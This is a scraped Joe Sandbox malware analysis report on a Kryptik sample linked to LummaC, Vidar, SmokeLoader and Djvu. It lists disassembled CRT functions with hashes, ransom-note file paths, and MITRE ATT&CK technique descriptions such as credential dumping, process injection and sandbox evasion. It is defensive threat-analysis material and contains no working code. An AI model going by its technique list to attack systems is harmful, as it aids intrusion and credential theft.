__CxxThrowException@8.LIBCMT ref: 048EF535
_memset.LIBCMT ref: 048EF554
__CxxThrowException@8.LIBCMT ref: 048EF57A
_sprintf.LIBCMT ref: 048EF594

Memory Dump Source

Source File: 0000000D.00000002.1771744600.00000000048E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 048E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_48e0000_1601.jbxd

Yara matches

Similarity

API ID: Exception@8Throw$_memset_sprintf
String ID:
API String ID: 217217746-0
Opcode ID: 16aaa772ddb988d461e4337924cf716956fc1cb963719ed600faa1ffd715582e
Instruction ID: e9b39265ff94ecef9df5a207af2b5e0fa451b3646cc506b89019a7178a835aa9
Opcode Fuzzy Hash: 16aaa772ddb988d461e4337924cf716956fc1cb963719ed600faa1ffd715582e
Instruction Fuzzy Hash: AB518271D40209BAEF11DFA1DC46FFFBBB8EB49704F104529FA05F6180E6746A058BA4

Uniqueness

Uniqueness Score: -1.00%

Function 0492208B Relevance: 9.1, APIs: 6, Instructions: 112COMMON

Download Yara Rule

APIs

__getenv_helper_nolock.LIBCMT ref: 049220C6
__invoke_watson.LIBCMT ref: 04922120
_strlen.LIBCMT ref: 049220D4

Part of subcall function 04905BA8: __getptd_noexit.LIBCMT ref: 04905BA8

_strnlen.LIBCMT ref: 0492215F
__lock.LIBCMT ref: 04922170
__getenv_helper_nolock.LIBCMT ref: 0492217B

Memory Dump Source

Source File: 0000000D.00000002.1771744600.00000000048E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 048E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_48e0000_1601.jbxd

Yara matches

Similarity

API ID: __getenv_helper_nolock$__getptd_noexit__invoke_watson__lock_strlen_strnlen
String ID:
API String ID: 3534693527-0
Opcode ID: 7b5cd30b09028c4688c7add7ba7a2b705b2aa5fc65eb7c357d53e3922a347f5d
Instruction ID: c196b215564d14c35facc400548280d75711c2be548735cce254c1ecf365ef3b
Opcode Fuzzy Hash: 7b5cd30b09028c4688c7add7ba7a2b705b2aa5fc65eb7c357d53e3922a347f5d
Instruction Fuzzy Hash: E731FE31A40231AFFB217F649D01FAE37989F85728F1185B5E904EF1C4DB74B5418791

Uniqueness

Uniqueness Score: -1.00%

Function 049A66D9 Relevance: 9.1, APIs: 6, Instructions: 100COMMON

Download Yara Rule

APIs

__getptd_noexit.LIBCMT ref: 049A66DD

Part of subcall function 049059BF: __calloc_crt.LIBCMT ref: 049059E2
Part of subcall function 049059BF: __initptd.LIBCMT ref: 04905A04

__calloc_crt.LIBCMT ref: 049A6700
__get_sys_err_msg.LIBCMT ref: 049A671E
__invoke_watson.LIBCMT ref: 049A673B
__get_sys_err_msg.LIBCMT ref: 049A676D
__invoke_watson.LIBCMT ref: 049A678B

Memory Dump Source

Source File: 0000000D.00000002.1771744600.00000000048E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 048E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_48e0000_1601.jbxd

Yara matches

Similarity

API ID: __calloc_crt__get_sys_err_msg__invoke_watson$__getptd_noexit__initptd
String ID:
API String ID: 4066021419-0
Opcode ID: 560737a3d48f69e2c1bbacaa64e20750b253c0be39bebdd764001766347183bc
Instruction ID: 12609231f383fcb34921a8eaedb16842af7dfaa499935467ac2bbd182acbc722
Opcode Fuzzy Hash: 560737a3d48f69e2c1bbacaa64e20750b253c0be39bebdd764001766347183bc
Instruction Fuzzy Hash: 6811C4726007247FFB217A25DC00BAA738CDFC0768F084476FE8896290E621FD2046D4

Uniqueness

Uniqueness Score: -1.00%

Function 048F2670 Relevance: 7.4, APIs: 3, Strings: 1, Instructions: 382COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 048F26DB
_memset.LIBCMT ref: 048F2A30
_memset.LIBCMT ref: 048F2AC0

Strings

D, xrefs: 048F2AC8

Memory Dump Source

Source File: 0000000D.00000002.1771744600.00000000048E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 048E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_48e0000_1601.jbxd

Yara matches

Similarity

API ID: _memset
String ID: D
API String ID: 2102423945-2746444292
Opcode ID: dedb8dcdcede06716d2048126f6c935cbca30f7ec4e51b62ea2b6cedae773fd8
Instruction ID: a71cad7fdc1748b45b7272f7b6b0550fe88dc61fa0fd16081b9f1ce2c81dba6d
Opcode Fuzzy Hash: dedb8dcdcede06716d2048126f6c935cbca30f7ec4e51b62ea2b6cedae773fd8
Instruction Fuzzy Hash: C3E17C71D0021AEADF24DFA0CC49FEEB7B8BF04304F1445A9EA09E6190EB756A45CF54

Uniqueness

Uniqueness Score: -1.00%

Function 048ED8B0 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 228COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 048ED8EA

Strings

$, xrefs: 048EDAE2
, xrefs: 048EDADB
(, xrefs: 048EDAE9

Memory Dump Source

Source File: 0000000D.00000002.1771744600.00000000048E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 048E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_48e0000_1601.jbxd

Yara matches

Similarity

API ID: _memset
String ID: $$$(
API String ID: 2102423945-3551151888
Opcode ID: d910fc5c6766dfc0bc4f58c39da0494fd508bff05af182706436a08bc08c5056
Instruction ID: dd153fb90be5f053ddd10a03a0952e1aa32e3c9651cc930ed106e25ab2ea334c
Opcode Fuzzy Hash: d910fc5c6766dfc0bc4f58c39da0494fd508bff05af182706436a08bc08c5056
Instruction Fuzzy Hash: C391C171D00209DAEF21DFA4CC49BEEBBF4AF06308F144669D515B72C0E7B66A48CB55

Uniqueness

Uniqueness Score: -1.00%

Function 04905CE1 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 91COMMONLIBRARYCODE

Download Yara Rule

APIs

_wcsnlen.LIBCMT ref: 04905CF4

Strings

U, xrefs: 04905CFD

Memory Dump Source

Source File: 0000000D.00000002.1771744600.00000000048E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 048E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_48e0000_1601.jbxd

Yara matches

Similarity

API ID: _wcsnlen
String ID: U
API String ID: 3628947076-3372436214
Opcode ID: ddbdfe4e8834e254b395da421ec3c28ac3be050359a4b81b0499ab3bd56dfaa9
Instruction ID: 398383572e18903ea15902a9d2d3444c9a71b1c6a999ef8433ca8eab5f5e0190
Opcode Fuzzy Hash: ddbdfe4e8834e254b395da421ec3c28ac3be050359a4b81b0499ab3bd56dfaa9
Instruction Fuzzy Hash: 5D21D83265420CBEEB00DAA49C49BBE73DDDB85670F518575FA09C61D0FA71FD408AA4

Uniqueness

Uniqueness Score: -1.00%

Function 048FA810 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 22COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 048FA858
_memset.LIBCMT ref: 048FA869
_memset.LIBCMT ref: 048FA87A

Strings

p2Q, xrefs: 048FA882

Memory Dump Source

Source File: 0000000D.00000002.1771744600.00000000048E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 048E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_48e0000_1601.jbxd

Yara matches

Similarity

API ID: _memset
String ID: p2Q
API String ID: 2102423945-1521255505
Opcode ID: 46ecb9121aab2c4594d1f343841fc1340943ec8095ce101e3444a0aa36bfb78c
Instruction ID: 3a99801737eaeeb91312a78c3830b6f5c7d109bd753ec24792efff9948dfa3ad
Opcode Fuzzy Hash: 46ecb9121aab2c4594d1f343841fc1340943ec8095ce101e3444a0aa36bfb78c
Instruction Fuzzy Hash: A6F0ED78698751A9F7217790FC26B857E917B31B08F108098E1182E2E1D3FD338CA79A

Uniqueness

Uniqueness Score: -1.00%

Function 0492FBDE Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15COMMON

Download Yara Rule

APIs

std::exception::exception.LIBCMT ref: 0492FBF1

Part of subcall function 0491169C: std::exception::_Copy_str.LIBCMT ref: 049116B5

__CxxThrowException@8.LIBCMT ref: 0492FC06

Strings

TeM, xrefs: 0492FBFE
TeM, xrefs: 0492FBE7, 0492FBFB

Memory Dump Source

Source File: 0000000D.00000002.1771744600.00000000048E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 048E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_48e0000_1601.jbxd

Yara matches

Similarity

API ID: Copy_strException@8Throwstd::exception::_std::exception::exception
String ID: TeM$TeM
API String ID: 3662862379-3870166017
Opcode ID: 96199cc15ff6b6db5c9edb5d1ae12cb70dd59b1139974201ea7fd9c915f9b6e6
Instruction ID: 9b40c938926e366ed142f0696c308dbb2ffbefd1ef5886caf0411d12fbc0896b
Opcode Fuzzy Hash: 96199cc15ff6b6db5c9edb5d1ae12cb70dd59b1139974201ea7fd9c915f9b6e6
Instruction Fuzzy Hash: 7DD06775C0020CBBDB00EFA5D45ACDDBBB8AA44348B40C466AA1497255EA74A7498B94

Uniqueness

Uniqueness Score: -1.00%

Function 048ED0E0 Relevance: 6.3, APIs: 4, Instructions: 254COMMON

Download Yara Rule

APIs

Part of subcall function 0490197D: __wfsopen.LIBCMT ref: 04901988

_fgetws.LIBCMT ref: 048ED15C

Memory Dump Source

Source File: 0000000D.00000002.1771744600.00000000048E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 048E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_48e0000_1601.jbxd

Yara matches

Similarity

API ID: __wfsopen_fgetws
String ID:
API String ID: 853134316-0
Opcode ID: fb686944b339c976eacea12c72b2cba8865104c98ae0a1a06473ea49a68c22d9
Instruction ID: 4f851f53dc6642695cf7a80c9890f4461858217eebf82859b2598b2902dc123f
Opcode Fuzzy Hash: fb686944b339c976eacea12c72b2cba8865104c98ae0a1a06473ea49a68c22d9
Instruction Fuzzy Hash: A291B472D0021A9BDF20DFA9CC457BEB7F5AF45304F144A29E815E7281E776BA08CB91

Uniqueness

Uniqueness Score: -1.00%

Function 048ED540 Relevance: 6.2, APIs: 4, Instructions: 240COMMON

Download Yara Rule

APIs

__except_handler4.MSVCRT ref: 048ED77E
_malloc.LIBCMT ref: 048ED7B2
_malloc.LIBCMT ref: 048ED7C1
_fprintf.LIBCMT ref: 048ED815

Memory Dump Source

Source File: 0000000D.00000002.1771744600.00000000048E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 048E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_48e0000_1601.jbxd

Yara matches

Similarity

API ID: _malloc$__except_handler4_fprintf
String ID:
API String ID: 1783060780-0
Opcode ID: bc6d813e7e752583a03017172366884d0a88b051dc04778f03b6bdc3bc976eb1
Instruction ID: 02ad238c278420c25096bf9582727f5db7bdcf7229868f59b2b73412b1b3f315
Opcode Fuzzy Hash: bc6d813e7e752583a03017172366884d0a88b051dc04778f03b6bdc3bc976eb1
Instruction Fuzzy Hash: 3FA1A2B1C00249DBEF11EFD4CC49BEEBBB0AF15308F144538D505B6291E7B66A48CBA6

Uniqueness

Uniqueness Score: -1.00%

Function 04902AD0 Relevance: 6.2, APIs: 4, Instructions: 163COMMONLIBRARYCODE

Download Yara Rule

APIs

_memset.LIBCMT ref: 04902B2E
__read_nolock.LIBCMT ref: 04902BFE
__filbuf.LIBCMT ref: 04902C21
_memset.LIBCMT ref: 04902C65

Part of subcall function 04905BA8: __getptd_noexit.LIBCMT ref: 04905BA8

Memory Dump Source

Source File: 0000000D.00000002.1771744600.00000000048E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 048E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_48e0000_1601.jbxd

Yara matches

Similarity

API ID: _memset$__filbuf__getptd_noexit__read_nolock
String ID:
API String ID: 2974526305-0
Opcode ID: 7a4cfea45ad1cabaf48d6d85d658ec87b7d71ccae72904ede4351d6e655b18a3
Instruction ID: d81e935eb520125b7a0d2ab875db73df8b6304fb714586ad7e2831a4205e0c12
Opcode Fuzzy Hash: 7a4cfea45ad1cabaf48d6d85d658ec87b7d71ccae72904ede4351d6e655b18a3
Instruction Fuzzy Hash: 9D51B234A00316DFDB258FA9888866EB7BAAF41324F14C7F9E835962D0E770BD50CB40

Uniqueness

Uniqueness Score: -1.00%

Function 04921359 Relevance: 6.0, APIs: 4, Instructions: 48COMMON

Download Yara Rule

APIs

__cftof_l.LIBCMT ref: 0492137D

Part of subcall function 04921A9D: __fltout2.LIBCMT ref: 04921AC6

__cftog_l.LIBCMT ref: 049213A3
__cftoe_l.LIBCMT ref: 049213D5

Memory Dump Source

Source File: 0000000D.00000002.1771744600.00000000048E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 048E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_48e0000_1601.jbxd

Yara matches

Similarity

API ID: __cftoe_l__cftof_l__cftog_l__fltout2
String ID:
API String ID: 3016257755-0
Opcode ID: e393168896588b0b80739e59f19fb333f0c598a6fe77797445646574719babf5
Instruction ID: 728f79e74709f3b4f13ff094e0298515c3eb6fb22518af4a84d0bc31ede95039
Opcode Fuzzy Hash: e393168896588b0b80739e59f19fb333f0c598a6fe77797445646574719babf5
Instruction Fuzzy Hash: 56018C3200015EFBCF126E84CE02CEE3F67BB58344B088425FA9858438D333E5B2AB81

Uniqueness

Uniqueness Score: -1.00%

Function 049A7A34 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE

Download Yara Rule

APIs

___BuildCatchObject.LIBCMT ref: 049A7A4B

Part of subcall function 049A8140: ___BuildCatchObjectHelper.LIBCMT ref: 049A8172
Part of subcall function 049A8140: ___AdjustPointer.LIBCMT ref: 049A8189

_UnwindNestedFrames.LIBCMT ref: 049A7A62
___FrameUnwindToState.LIBCMT ref: 049A7A74
CallCatchBlock.LIBCMT ref: 049A7A98

Memory Dump Source

Source File: 0000000D.00000002.1771744600.00000000048E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 048E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_48e0000_1601.jbxd

Yara matches

Similarity

API ID: Catch$BuildObjectUnwind$AdjustBlockCallFrameFramesHelperNestedPointerState
String ID:
API String ID: 2901542994-0
Opcode ID: dd3ac78af2fd1184da527a8de72168518a9c3bdc752cc05c4f080d411e07ec88
Instruction ID: cb267ca53bf57a1419795440b48c6bce0637d3ee7d5311d2154be4342e9fb862
Opcode Fuzzy Hash: dd3ac78af2fd1184da527a8de72168518a9c3bdc752cc05c4f080d411e07ec88
Instruction Fuzzy Hash: C001D736000109BBDF12AF95CC05EDA7BBAEF88758F158064F95865120D732E971DBE0

Uniqueness

Uniqueness Score: -1.00%

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute malicious payloads via loading shared modules. Shared modules are executable files that are loaded into processes to provide access to reusable code, such as specific custom functions or invoking OS API functions (i.e., Native API ).
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Application Log: Application Log Content, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary (ex: Ingress Tool Transfer ) may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Deletion
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to hide configuration information within Registry keys, remove information as part of cleaning up, or as part of other techniques to aid in persistence and execution.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches ( `dir /a` for Windows and `ls –a` for Linux and macOS).
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report SecuriteInfo.com.W32.Kryptik.GYGF.tr.29287.4482.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: LummaC

Threatname: Vidar

Threatname: SmokeLoader

Threatname: Djvu

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Snort Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

Spam, unwanted Advertisements and Ransom Demands

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\$WinREAgent\Scratch\_README.txt

C:\$WinREAgent\_README.txt

C:\ProgramData\AAEGHJKJKKJDHIDHJKJDBGCGCB

C:\ProgramData\BFHDAEHD

C:\ProgramData\BKEBFHIJECFIDGDGCGHCGIIECA

C:\ProgramData\CAAAAFBKFIECAAKECGCAAKJECB

Windows Analysis Report
SecuriteInfo.com.W32.Kryptik.GYGF.tr.29287.4482.exe

Description:	Adversaries may hook into Windows application programming interface (API) functions to collect user credentials. Malicious hooking mechanisms may capture API calls that include parameters that reveal user authentication credentials.Unlike Keylogging , this technique focuses specifically on API functions that include parameters that reveal user credentials. Hooking involves redirecting calls to these functions and can be implemented via:
Tactics:	Collection, Credential Access
Data Sources:	Process: OS API Execution, Process: Process Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.
Tactics:	Credential Access
Data Sources:	Command: Command Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., Valid Accounts ).
Tactics:	Discovery
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
